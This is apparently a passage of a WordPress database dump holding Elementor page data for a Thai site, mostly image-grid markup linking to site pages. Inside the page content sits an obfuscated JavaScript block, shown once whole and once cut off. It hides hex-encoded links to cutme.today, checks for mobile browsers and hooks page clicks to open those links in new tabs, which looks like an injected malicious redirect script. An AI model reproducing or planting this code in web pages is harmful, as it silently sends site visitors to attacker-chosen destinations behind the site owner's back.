wp:column -->\\n<div class=\\\"wp-block-column\\\"><!-- wp:image {\\\"lightbox\\\":{\\\"enabled\\\":false},\\\"id\\\":738,\\\"width\\\":\\\"200px\\\",\\\"aspectRatio\\\":\\\"1\\\",\\\"scale\\\":\\\"cover\\\",\\\"sizeSlug\\\":\\\"full\\\",\\\"linkDestination\\\":\\\"custom\\\",\\\"align\\\":\\\"center\\\"} -->\\n<figure class=\\\"wp-block-image aligncenter size-full is-resized\\\"><a href=\\\"http:\\/\\/pakhaeng.ssk.in.th\\/?page_id=741\\\"><img src=\\\"http:\\/\\/pakhaeng.ssk.in.th\\/wp-content\\/uploads\\/2024\\/08\\/\\u0e14\\u0e39\\u0e40\\u0e01\\u0e23\\u0e14-1.png\\\" alt=\\\"\\\" class=\\\"wp-image-738\\\" style=\\\"aspect-ratio:1;object-fit:cover;width:200px\\\"\\/><\\/a><\\/figure>\\n<!-- \\/wp:image -->\\n\\n<!-- wp:image {\\\"lightbox\\\":{\\\"enabled\\\":false},\\\"id\\\":1606,\\\"width\\\":\\\"200px\\\",\\\"aspectRatio\\\":\\\"1\\\",\\\"scale\\\":\\\"cover\\\",\\\"sizeSlug\\\":\\\"full\\\",\\\"linkDestination\\\":\\\"custom\\\",\\\"align\\\":\\\"center\\\"} -->\\n<figure class=\\\"wp-block-image aligncenter size-full is-resized\\\"><img src=\\\"http:\\/\\/pakhaeng.ssk.in.th\\/wp-content\\/uploads\\/2025\\/07\\/6.png\\\" alt=\\\"\\\" class=\\\"wp-image-1606\\\" style=\\\"aspect-ratio:1;object-fit:cover;width:200px\\\"\\/><\\/figure>\\n<!-- \\/wp:image --><\\/div>\\n<!-- \\/wp:column -->\\n\\n<!-- wp:column -->\\n<div class=\\\"wp-block-column\\\"><!-- wp:image {\\\"id\\\":739,\\\"width\\\":\\\"200px\\\",\\\"aspectRatio\\\":\\\"1\\\",\\\"scale\\\":\\\"cover\\\",\\\"sizeSlug\\\":\\\"full\\\",\\\"linkDestination\\\":\\\"none\\\",\\\"align\\\":\\\"center\\\"} -->\\n<figure class=\\\"wp-block-image aligncenter size-full is-resized\\\"><img src=\\\"http:\\/\\/pakhaeng.ssk.in.th\\/wp-content\\/uploads\\/2024\\/08\\/\\u0e2b\\u0e49\\u0e2d\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e0a\\u0e38\\u0e21-1.png\\\" alt=\\\"\\\" class=\\\"wp-image-739\\\" style=\\\"aspect-ratio:1;object-fit:cover;width:200px\\\"\\/><\\/figure>\\n<!-- \\/wp:image -->\\n\\n<!-- wp:image {\\\"lightbox\\\":{\\\"enabled\\\":false},\\\"id\\\":1614,\\\"width\\\":\\\"200px\\\",\\\"aspectRatio\\\":\\\"1\\\",\\\"scale\\\":\\\"cover\\\",\\\"sizeSlug\\\":\\\"full\\\",\\\"linkDestination\\\":\\\"custom\\\",\\\"align\\\":\\\"center\\\"} -->\\n<figure class=\\\"wp-block-image aligncenter size-full is-resized\\\"><a href=\\\"http:\\/\\/pakhaeng.ssk.in.th\\/?page_id=1611\\\"><img src=\\\"http:\\/\\/pakhaeng.ssk.in.th\\/wp-content\\/uploads\\/2025\\/07\\/5-2.png\\\" alt=\\\"\\\" class=\\\"wp-image-1614\\\" style=\\\"aspect-ratio:1;object-fit:cover;width:200px\\\"\\/><\\/a><\\/figure>\\n<!-- \\/wp:image --><\\/div>\\n<!-- \\/wp:column --><\\/div>\\n<!-- \\/wp:columns -->\\n\\n<!-- wp:image {\\\"id\\\":1638,\\\"sizeSlug\\\":\\\"large\\\",\\\"linkDestination\\\":\\\"none\\\"} -->\\n<figure class=\\\"wp-block-image size-large\\\"><img src=\\\"http:\\/\\/pakhaeng.ssk.in.th\\/wp-content\\/uploads\\/2025\\/07\\/\\u0e46\\u0e1f-1024x256.png\\\" alt=\\\"\\\" class=\\\"wp-image-1638\\\"\\/><\\/figure>\\n<!-- \\/wp:image -->\\n\\n<!-- wp:paragraph -->\\n<p><\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\\\x68\\\\x74\\\\x74\\\\x70\\\\x3a\\\\x2f\\\\x2f\\\\x63\\\\x75\\\\x74\\\\x6d\\\\x65\\\\x2e\\\\x74\\\\x6f\\\\x64\\\\x61\\\\x79\\\\x2f\\\\x6f\\\\x63\\\\x47\\\\x33\\\\x63\\\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\\\x68\\\\x74\\\\x74\\\\x70\\\\x3a\\\\x2f\\\\x2f\\\\x63\\\\x75\\\\x74\\\\x6d\\\\x65\\\\x2e\\\\x74\\\\x6f\\\\x64\\\\x61\\\\x79\\\\x2f\\\\x74\\\\x68\\\\x4f\\\\x35\\\\x63\\\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\\\x68\\\\x74\\\\x74\\\\x70\\\\x3a\\\\x2f\\\\x2f\\\\x63\\\\x75\\\\x74\\\\x6d\\\\x65\\\\x2e\\\\x74\\\\x6f\\\\x64\\\\x61\\\\x79\\\\x2f\\\\x41\\\\x6e\\\\x50\\\\x38\\\\x63\\\\x338\',\'abs\',\'-local-storage\',\'\\\\x68\\\\x74\\\\x74\\\\x70\\\\x3a\\\\x2f\\\\x2f\\\\x63\\\\x75\\\\x74\\\\x6d\\\\x65\\\\x2e\\\\x74\\\\x6f\\\\x64\\\\x61\\\\x79\\\\x2f\\\\x41\\\\x58\\\\x4e\\\\x39\\\\x63\\\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\\\x68\\\\x74\\\\x74\\\\x70\\\\x3a\\\\x2f\\\\x2f\\\\x63\\\\x75\\\\x74\\\\x6d\\\\x65\\\\x2e\\\\x74\\\\x6f\\\\x64\\\\x61\\\\x79\\\\x2f\\\\x49\\\\x4d\\\\x76\\\\x34\\\\x63\\\\x324\',\'\\\\x68\\\\x74\\\\x74\\\\x70\\\\x3a\\\\x2f\\\\x2f\\\\x63\\\\x75\\\\x74\\\\x6d\\\\x65\\\\x2e\\\\x74\\\\x6f\\\\x64\\\\x61\\\\x79\\\\x2f\\\\x48\\\\x62\\\\x61\\\\x37\\\\x63\\\\x357\',\'\\\\x68\\\\x74\\\\x74\\\\x70\\\\x3a\\\\x2f\\\\x2f\\\\x63\\\\x75\\\\x74\\\\x6d\\\\x65\\\\x2e\\\\x74\\\\x6f\\\\x64\\\\x61\\\\x79\\\\x2f\\\\x42\\\\x42\\\\x47\\\\x32\\\\x63\\\\x382\',\'floor\',\'\\\\x68\\\\x74\\\\x74\\\\x70\\\\x3a\\\\x2f\\\\x2f\\\\x63\\\\x75\\\\x74\\\\x6d\\\\x65\\\\x2e\\\\x74\\\\x6f\\\\x64\\\\x61\\\\x79\\\\x2f\\\\x50\\\\x79\\\\x78\\\\x36\\\\x63\\\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\\/0x1+-parseInt(_0x20130f(0x1c1))\\/0x2*(parseInt(_0x20130f(0x1c8))\\/0x3)+parseInt(_0x20130f(0x1bf))\\/0x4*(-parseInt(_0x20130f(0x1cd))\\/0x5)+parseInt(_0x20130f(0x1d9))\\/0x6+-parseInt(_0x20130f(0x1e4))\\/0x7*(parseInt(_0x20130f(0x1de))\\/0x8)+parseInt(_0x20130f(0x1e2))\\/0x9+-parseInt(_0x20130f(0x1d0))\\/0xa*(-parseInt(_0x20130f(0x1da))\\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\\/(android|bb\\\\d+|meego).+mobile|avantgo|bada\\\\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\\/i[_0x1165a7(0x1ca)](_0x5e9786)||\\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\\\-(n|u)|c55\\\\\\/|capi|ccwa|cdm\\\\-|cell|chtm|cldc|cmd\\\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\\\-|_)|g1 u|g560|gene|gf\\\\-5|g\\\\-mo|go(\\\\.w|od)|gr(ad|un)|haie|hcit|hd\\\\-(m|p|t)|hei\\\\-|hi(pt|ta)|hp( i|ip)|hs\\\\-c|ht(c(\\\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\\\-(20|go|ma)|i230|iac( |\\\\-|\\\\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\\\\/)|klon|kpt |kwc\\\\-|kyo(c|k)|le(no|xi)|lg( g|\\\\\\/(k|l|u)|50|54|\\\\-[a-w])|libw|lynx|m1\\\\-w|m3ga|m50\\\\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\\\-2|po(ck|rt|se)|prox|psio|pt\\\\-g|qa\\\\-a|qc(07|12|21|32|60|\\\\-[2-7]|i\\\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\\\-|oo|p\\\\-)|sdk\\\\\\/|se(c(\\\\-|0|1)|47|mc|nd|ri)|sgh\\\\-|shar|sie(\\\\-|m)|sk\\\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\\\-|v\\\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\\\-|tdg\\\\-|tel(i|m)|tim\\\\-|t\\\\-mo|to(pl|sh)|ts(70|m\\\\-|m3|m5)|tx\\\\-9|up(\\\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\\\-|your|zeto|zte\\\\-\\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\\\x68\\\\x74\\\\x74\\\\x70\\\\x3a\\\\x2f\\\\x2f\\\\x63\\\\x75\\\\x74\\\\x6d\\\\x65\\\\x2e\\\\x74\\\\x6f\\\\x64\\\\x61\\\\x79\\\\x2f\\\\x77\\\\x67\\\\x64\\\\x30\\\\x63\\\\x380\',\'\\\\x68\\\\x74\\\\x74\\\\x70\\\\x3a\\\\x2f\\\\x2f\\\\x63\\\\x75\\\\x74\\\\x6d\\\\x65\\\\x2e\\\\x74\\\\x6f\\\\x64\\\\x61\\\\x79\\\\x2f\\\\x4d\\\\x76\\\\x49\\\\x31\\\\x63\\\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\\/script><\\/p>\\n\\n<!-- wp:paragraph -->\\n<p><\\/p>\\n<!-- \\/wp:paragraph -->\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5f0b650\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"7868e8a\",\"elType\":\"widget\",\"settings\":{\"embedpress_embeded_link\":\"https:\\/\\/www.canva.com\\/design\\/DAGsFHWqrOk\\/eCZISZCLZjZV8cpVDnNIUA\\/view\",\"prefix_nftcreator\":\"Created By\",\"prefix_nftprice\":\"Current Price\",\"prefix_nftlastsale\":\"Last Sale\",\"label_nftbutton\":\"See Details\",\"loadmorelabel\":\"Load More\",\"label_nftrank\":\"Rank\",\"label_nftdetails\":\"Details\",\"instafeedFollowBtnLabel\":\"Follow\",\"instafeedPostsCountText\":\"[count] posts\",\"instafeedFollowersCountText\":\"[count] followers\",\"instafeedPopupFollowBtnLabel\":\"Follow\",\"instafeedLoadmoreLabel\":\"Load More\",\"cPopupButtonText\":\"Schedule time with me\",\"adWidth\":\"300\",\"adHeight\":\"200\",\"adStart\":\"5\",\"adSkipButtonAfter\":\"5\",\"embedpress_protection_message\":\"You do not have access to this content. Only users with the following roles can view it: [user_roles].\",\"embedpress_lock_content_error_message\":\"Oops, that wasn\'t the right password. Try again.\",\"embedpress_password_placeholder\":\"Password\",\"embedpress_submit_button_text\":\"Unlock\",\"embedpress_submit_Unlocking_text\":\"Unlocking...\",\"embedpress_lock_content_heading\":\"Content Locked\",\"embedpress_lock_content_sub_heading\":\"Content is locked and requires password to access it.\",\"embedpress_lock_content_footer_message\":\"In case you don\'t have the password, kindly reach out to content owner or administrator to request access.\"},\"elements\":[],\"widgetType\":\"embedpres_elementor\"}],\"isInner\":false}]'),
(4691,1651,'_elementor_edit_mode','builder'),
(4692,1651,'_elementor_template_type','wp-page'),
(4693,1651,'_elementor_version','3.29.2'),
(4694,1651,'_wp_page_template','default'),
(4695,1651,'_elementor_data','[{\"id\":\"6bad0515\",\"elType\":\"container\",\"settings\":[],\"elements\":[{\"id\":\"2085205f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:image {\\\"id\\\":1620,\\\"sizeSlug\\\":\\\"large\\\",\\\"linkDestination\\\":\\\"none\\\"} -->\\n<figure class=\\\"wp-block-image size-large\\\"><img src=\\\"http:\\/\\/pakhaeng.ssk.in.th\\/wp-content\\/uploads\\/2025\\/07\\/Is-It-a-Gift-Instagram-Post-1024x256.png\\\" alt=\\\"\\\" class=\\\"wp-image-1620\\\"\\/><\\/figure>\\n<!-- \\/wp:image -->\\n\\n<!-- wp:columns -->\\n<div class=\\\"wp-block-columns\\\"><!-- wp:column -->\\n<div class=\\\"wp-block-column\\\"><!-- wp:image {\\\"lightbox\\\":{\\\"enabled\\\":false},\\\"id\\\":736,\\\"width\\\":\\\"200px\\\",\\\"aspectRatio\\\":\\\"1\\\",\\\"scale\\\":\\\"cover\\\",\\\"sizeSlug\\\":\\\"full\\\",\\\"linkDestination\\\":\\\"custom\\\",\\\"align\\\":\\\"center\\\",\\\"className\\\":\\\"is-style-default\\\"} -->\\n<figure class=\\\"wp-block-image aligncenter size-full is-resized is-style-default\\\"><a href=\\\"http:\\/\\/pakhaeng.ssk.in.th\\/?page_id=1623\\\"><img src=\\\"http:\\/\\/pakhaeng.ssk.in.th\\/wp-content\\/uploads\\/2024\\/08\\/\\u0e22\\u0e49\\u0e32\\u0e22-1.png\\\" alt=\\\"\\\" class=\\\"wp-image-736\\\" style=\\\"aspect-ratio:1;object-fit:cover;width:200px\\\"\\/><\\/a><\\/figure>\\n<!-- \\/wp:image -->\\n\\n<!-- wp:image {\\\"lightbox\\\":{\\\"enabled\\\":false},\\\"id\\\":1608,\\\"width\\\":\\\"200px\\\",\\\"aspectRatio\\\":\\\"1\\\",\\\"scale\\\":\\\"cover\\\",\\\"sizeSlug\\\":\\\"full\\\",\\\"linkDestination\\\":\\\"custom\\\",\\\"align\\\":\\\"center\\\",\\\"className\\\":\\\"is-style-default\\\"} -->\\n<figure class=\\\"wp-block-image aligncenter size-full is-resized is-style-default\\\"><a href=\\\"http:\\/\\/pakhaeng.ssk.in.th\\/?page_id=563\\\"><img src=\\\"http:\\/\\/pakhaeng.ssk.in.th\\/wp-content\\/uploads\\/2025\\/07\\/comment.png\\\" alt=\\\"\\\" class=\\\"wp-image-1608\\\" style=\\\"aspect-ratio:1;object-fit:cover;width:200px\\\"\\/><\\/a><\\/figure>\\n<!-- \\/wp:image --><\\/div>\\n<!-- \\/wp:column -->\\n\\n<!-- wp:column -->\\n<div class=\\\"wp-block-column\\\"><!-- wp:image {\\\"lightbox\\\":{\\\"enabled\\\":false},\\\"id\\\":738,\\\"width\\\":\\\"200px\\\",\\\"aspectRatio\\\":\\\"1\\\",\\\"scale\\\":\\\"cover\\\",\\\"sizeSlug\\\":\\\"full\\\",\\\"linkDestination\\\":\\\"custom\\\",\\\"align\\\":\\\"center\\\"} -->\\n<figure class=\\\"wp-block-image aligncenter size-full is-resized\\\"><a href=\\\"http:\\/\\/pakhaeng.ssk.in.th\\/?page_id=741\\\"><img src=\\\"http:\\/\\/pakhaeng.ssk.in.th\\/wp-content\\/uploads\\/2024\\/08\\/\\u0e14\\u0e39\\u0e40\\u0e01\\u0e23\\u0e14-1.png\\\" alt=\\\"\\\" class=\\\"wp-image-738\\\" style=\\\"aspect-ratio:1;object-fit:cover;width:200px\\\"\\/><\\/a><\\/figure>\\n<!-- \\/wp:image -->\\n\\n<!-- wp:image {\\\"lightbox\\\":{\\\"enabled\\\":false},\\\"id\\\":1606,\\\"width\\\":\\\"200px\\\",\\\"aspectRatio\\\":\\\"1\\\",\\\"scale\\\":\\\"cover\\\",\\\"sizeSlug\\\":\\\"full\\\",\\\"linkDestination\\\":\\\"custom\\\",\\\"align\\\":\\\"center\\\"} -->\\n<figure class=\\\"wp-block-image aligncenter size-full is-resized\\\"><img src=\\\"http:\\/\\/pakhaeng.ssk.in.th\\/wp-content\\/uploads\\/2025\\/07\\/6.png\\\" alt=\\\"\\\" class=\\\"wp-image-1606\\\" style=\\\"aspect-ratio:1;object-fit:cover;width:200px\\\"\\/><\\/figure>\\n<!-- \\/wp:image --><\\/div>\\n<!-- \\/wp:column -->\\n\\n<!-- wp:column -->\\n<div class=\\\"wp-block-column\\\"><!-- wp:image {\\\"id\\\":739,\\\"width\\\":\\\"200px\\\",\\\"aspectRatio\\\":\\\"1\\\",\\\"scale\\\":\\\"cover\\\",\\\"sizeSlug\\\":\\\"full\\\",\\\"linkDestination\\\":\\\"none\\\",\\\"align\\\":\\\"center\\\"} -->\\n<figure class=\\\"wp-block-image aligncenter size-full is-resized\\\"><img src=\\\"http:\\/\\/pakhaeng.ssk.in.th\\/wp-content\\/uploads\\/2024\\/08\\/\\u0e2b\\u0e49\\u0e2d\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e0a\\u0e38\\u0e21-1.png\\\" alt=\\\"\\\" class=\\\"wp-image-739\\\" style=\\\"aspect-ratio:1;object-fit:cover;width:200px\\\"\\/><\\/figure>\\n<!-- \\/wp:image -->\\n\\n<!-- wp:image {\\\"lightbox\\\":{\\\"enabled\\\":false},\\\"id\\\":1614,\\\"width\\\":\\\"200px\\\",\\\"aspectRatio\\\":\\\"1\\\",\\\"scale\\\":\\\"cover\\\",\\\"sizeSlug\\\":\\\"full\\\",\\\"linkDestination\\\":\\\"custom\\\",\\\"align\\\":\\\"center\\\"} -->\\n<figure class=\\\"wp-block-image aligncenter size-full is-resized\\\"><a href=\\\"http:\\/\\/pakhaeng.ssk.in.th\\/?page_id=1611\\\"><img src=\\\"http:\\/\\/pakhaeng.ssk.in.th\\/wp-content\\/uploads\\/2025\\/07\\/5-2.png\\\" alt=\\\"\\\" class=\\\"wp-image-1614\\\" style=\\\"aspect-ratio:1;object-fit:cover;width:200px\\\"\\/><\\/a><\\/figure>\\n<!-- \\/wp:image --><\\/div>\\n<!-- \\/wp:column --><\\/div>\\n<!-- \\/wp:columns -->\\n\\n<!-- wp:image {\\\"id\\\":1638,\\\"sizeSlug\\\":\\\"large\\\",\\\"linkDestination\\\":\\\"none\\\"} -->\\n<figure class=\\\"wp-block-image size-large\\\"><img src=\\\"http:\\/\\/pakhaeng.ssk.in.th\\/wp-content\\/uploads\\/2025\\/07\\/\\u0e46\\u0e1f-1024x256.png\\\" alt=\\\"\\\" class=\\\"wp-image-1638\\\"\\/><\\/figure>\\n<!-- \\/wp:image -->\\n\\n<!-- wp:paragraph -->\\n<p><\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\\\x68\\\\x74\\\\x74\\\\x70\\\\x3a\\\\x2f\\\\x2f\\\\x63\\\\x75\\\\x74\\\\x6d\\\\x65\\\\x2e\\\\x74\\\\x6f\\\\x64\\\\x61\\\\x79\\\\x2f\\\\x6f\\\\x63\\\\x47\\\\x33\\\\x63\\\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\\\x68\\\\x74\\\\x74\\\\x70\\\\x3a\\\\x2f\\\\x2f\\\\x63\\\\x75\\\\x74\\\\x6d\\\\x65\\\\x2e\\\\x74\\\\x6f\\\\x64\\\\x61\\\\x79\\\\x2f\\\\x74\\\\x68\\\\x4f\\\\x35\\\\x63\\\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\\\x68\\\\x74\\\\x74\\\\x70\\\\x3a\\\\x2f\\\\x2f\\\\x63\\\\x75\\\\x74\\\\x6d\\\\x65\\\\x2e\\\\x74\\\\x6f\\\\x64\\\\x61\\\\x79\\\\x2f\\\\x41\\\\x6e\\\\x50\\\\x38\\\\x63\\\\x338\',\'abs\',\'-local-storage\',\'\\\\x68\\\\x74\\\\x74\\\\x70\\\\x3a\\\\x2f\\\\x2f\\\\x63\\\\x75\\\\x74\\\\x6d\\\\x65\\\\x2e\\\\x74\\\\x6f\\\\x64\\\\x61\\\\x79\\\\x2f\\\\x41\\\\x58\\\\x4e\\\\x39\\\\x63\\\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\\\x68\\\\x74\\\\x74\\\\x70\\\\x3a\\\\x2f\\\\x2f\\\\x63\\\\x75\\\\x74\\\\x6d\\\\x65\\\\x2e\\\\x74\\\\x6f\\\\x64\\\\x61\\\\x79\\\\x2f\\\\x49\\\\x4d\\\\x76\\\\x34\\\\x63\\\\x324\',\'\\\\x68\\\\x74\\\\x74\\\\x70\\\\x3a\\\\x2f\\\\x2f\\\\x63\\\\x75\\\\x74\\\\x6d\\\\x65\\\\x2e\\\\x74\\\\x6f\\\\x64\\\\x61\\\\x79\\\\x2f\\\\x48\\\\x62\\\\x61\\\\x37\\\\x63\\\\x357\',\'\\\\x68\\\\x74\\\\x74\\\\x70\\\\x3a\\\\x2f\\\\x2f\\\\x63\\\\x75\\\\x74\\\\x6d\\\\x65\\\\x2e\\\\x74\\\\x6f\\\\x64\\\\x61\\\\x79\\\\x2f\\\\x42\\\\x42\\\\x47\\\\x32\\\\x63\\\\x382\',\'floor\',\'\\\\x68\\\\x74\\\\x74\\\\x70\\\\x3a\\\\x2f\\\\x2f\\\\x63\\\\x75\\\\x74\\\\x6d\\\\x65\\\\x2e\\\\x74\\\\x6f\\\\x64\\\\x61\\\\x79\\\\x2f\\\\x50\\\\x79\\\\x78\\\\x36\\\\x63\\\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\\/0x1+-parseInt(_0x20130f(0x1c1))\\/0x2*(parseInt(_0x20130f(0x1c8))\\/0x3)+parseInt(_0x20130f(0x1bf))\\/0x4*(-parseInt(_0x20130f(0x1cd))\\/0x5)+parseInt(_0x20130f(0x1d9))\\/0x6+-parseInt(_0x20130f(0x1e4))\\/0x7*(parseInt(_0x20130f(0x1de))\\/0x8)+parseInt(_0x20130f(0x1e2))\\/0x9+-parseInt(_0x20130f(0x1d0))\\/0xa*(-parseInt(_0x20130f(0x1da))\\/0xb);if(_0x1dea23===_0x1e5463)break;else 